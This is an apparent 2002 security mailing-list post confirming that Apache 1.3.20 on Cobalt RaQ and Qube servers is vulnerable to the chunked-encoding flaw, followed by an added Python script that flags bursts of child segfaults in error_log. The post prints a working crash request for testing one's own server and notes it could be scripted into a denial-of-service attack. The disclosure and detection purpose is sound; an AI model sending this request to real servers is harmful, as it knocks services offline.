
[cobalt-security] RaQ4, Qube3, XTR & RaQ550: Apache-1.3.20 *is* vulnerable (caught info on Bugtraq and confirmed it)



Hi all,

there has been some confusion about whether the Apache installed on the RaQs is 
vulnerable to the recently discovered issue or not.

Now that the Apache group has released official fixes, someone posted an 
exploit string on Bugtraq, which I then used on a couple of my RaQs to verify 
whether the RaQs are affected or not.

Here is a test string that can be used to check whether a server is vulnerable:

SSH or Telnet into your RaQ and do this:

telnet 127.0.0.1 80

That opens a telnet session to Apache. Then copy and paste the following into 
your SSH or Telnet session (all in one go from the first to the last line):

POST /x.html HTTP/1.1
Host: 192.168.0.1
Transfer-Encoding: chunked

80000000
Rapid 7
0

Here is the behavior that the above string will produce:

Apache 1.3.20 on the RaQ4, Qube3, RaQ550 and XTR:

        Connection is instantly dropped.
        The connection is not logged in the access_log, but the following
        will appear in the error_log:

[Wed Jun 19 22:30:54 2002] [notice] child pid 2924 exit signal Segmentation fault (11)

FWIW: The Apache-1.3.20 for the RaQ3 (offered on cobalt-aid) is vulnerable, 
too. 

I don't know if the stock RaQ2 and the RaQ3 Apache are affected, too, as I 
have no access to unmodified units of these with the stock Apache aboard.

FWIW: One doesn't have to be a rocket scientist to wrap the above exploit into 
a three-line shell script to run a DoS attack on a RaQ. 

SUN/Cobalt? Time to get into gear on this one. And while you're at it: GLIBC 
and memory issues ... sounds familiar? Where is the patch for that? :o/

-- 

With best regards

Michael Stauber
mstauber@xxxxxxxxxxxxxx
Unix/Linux Support Engineer
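As an added example that is not part of the original post: a Python script that scans an Apache 1.3 error_log for the child-segfault notice quoted above and flags any minute in which several children died that way, which is the trace a repeated run of this request leaves on an affected RaQ. The error_log excerpt below is constructed for the example, not a real capture.

```python
import re
from collections import Counter
from datetime import datetime

# Matches the crash notice Apache 1.3 writes to error_log, e.g.
# "[Wed Jun 19 22:30:54 2002] [notice] child pid 2924 exit signal Segmentation fault (11)"
SEGFAULT_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) "
    r"exit signal Segmentation fault \(11\)$"
)

def parse_segfaults(lines):
    """Return (timestamp, pid) for every child-segfault notice in error_log lines."""
    hits = []
    for line in lines:
        m = SEGFAULT_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
            hits.append((ts, int(m.group("pid"))))
    return hits

def crash_storms(lines, threshold=3):
    """Map each minute with at least `threshold` child segfaults to its crash count."""
    per_minute = Counter(ts.replace(second=0) for ts, _ in parse_segfaults(lines))
    return {minute: n for minute, n in per_minute.items() if n >= threshold}

# Constructed sample error_log (not a real capture): one isolated crash, then a
# burst of four crashes within a single minute, plus unrelated notices/errors.
SAMPLE_ERROR_LOG = """\
[Wed Jun 19 21:10:02 2002] [notice] Apache/1.3.20 (Unix) configured -- resuming normal operations
[Wed Jun 19 22:30:54 2002] [notice] child pid 2924 exit signal Segmentation fault (11)
[Wed Jun 19 23:41:10 2002] [notice] child pid 3101 exit signal Segmentation fault (11)
[Wed Jun 19 23:41:11 2002] [notice] child pid 3102 exit signal Segmentation fault (11)
[Wed Jun 19 23:41:13 2002] [notice] child pid 3104 exit signal Segmentation fault (11)
[Wed Jun 19 23:41:40 2002] [notice] child pid 3107 exit signal Segmentation fault (11)
[Wed Jun 19 23:42:00 2002] [error] [client 10.0.0.5] File does not exist: /home/httpd/html/x.html
""".splitlines()

if __name__ == "__main__":
    for minute, n in sorted(crash_storms(SAMPLE_ERROR_LOG).items()):
        print(f"{minute:%Y-%m-%d %H:%M}: {n} child segfaults")
```

Point it at the real /var/log/httpd/error_log (or wherever the RaQ keeps it) by reading the file into `lines`; a single segfault can be anything, but a burst in one minute with nothing in access_log is the pattern described in the post.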